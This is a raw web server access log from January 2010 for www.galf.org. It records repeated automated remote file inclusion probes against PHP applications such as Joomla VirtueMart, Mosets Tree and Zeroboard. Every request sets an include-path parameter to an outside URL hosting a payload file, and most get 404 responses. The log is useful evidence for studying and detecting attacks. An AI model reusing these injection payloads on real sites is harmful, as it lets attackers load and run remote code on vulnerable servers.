218.38.56.83 - - [11/Jan/2010:02:17:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:28 -0800] "GET /skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:28 -0800] "GET /logs/access_090810.log//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:29 -0800] "GET /logs/access_090810.log//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:29 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:30 -0800] "GET /skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:31 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:31 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:32 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:40 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:17:41 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:51 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:51 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:17:51 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:18:40 -0800] "GET /logs/access_091214.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:18:46 -0800] "GET /logs/access_091214.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:19:02 -0800] "GET /logs/access_091214.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:20:06 -0800] "GET /logs//samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:20:06 -0800] "GET /samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:20:06 -0800] "GET /logs/access_090622.log%20%20//samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:21:55 -0800] "GET /logs/access_090706.log%20%20//samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:30 -0800] "GET /skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:30 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:31 -0800] "GET /skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:31 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:43 -0800] "GET /logs/access_091116.log%20%20//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:02:26:44 -0800] "GET /logs/access_091116.log%20%20//skin_shop/standard/3_plugin_twindow=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:05 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:05 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:30 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:30 -0800] "GET /logs/access_090525.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:47 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:47 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:53 -0800] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:27:56 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:28:24 -0800] "GET /logs/access_091019.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:28:42 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:28:50 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:28:50 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:29:22 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:28 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:28 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:28 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:31 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:31 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:32 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:40 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:40 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:41 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:41 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:41 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:41 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:41 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:42 -0800] "GET /logs/access_090928.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:42 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:29:48 -0800] "GET /logs/access_090921.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:04 -0800] "GET /logs/access_090921.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:13 -0800] "GET /logs/access_090921.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:14 -0800] "GET /logs/access_090921.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:32 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:32 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:32 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:34 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:34 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:34 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:35 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:35 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:30:35 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:12 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:12 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:12 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:15 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:15 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:31:15 -0800] "GET /logs/access_090928.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:32:09 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:32:17 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:32:17 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:32:17 -0800] "GET /logs/access_091221.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:32:33 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:32:33 -0800] "GET /logs/access.log//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:32:33 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:02:32:37 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:02:32:37 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [11/Jan/2010:02:32:41 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:02:32:50 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:34:24 -0800] "GET /logs/access_090831.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:34:24 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:34:24 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:35:14 -0800] "GET /logs/access_090907.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:36:51 -0800] "GET /logs/access_091102.log%20%20///?_zb_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:36:51 -0800] "GET //?_zb_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:36:51 -0800] "GET /logs///?_zb_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:02 -0800] "GET /logs/access.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:02 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:02 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /logs/access.log//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:40:22 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:40:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:40:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:44:21 -0800] "GET /logs/access_090706.log//samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:02:44:22 -0800] "GET /logs/access_090921.log//samplefaqsupport.php?path[docroot]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:45:46 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:45:46 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:45:47 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
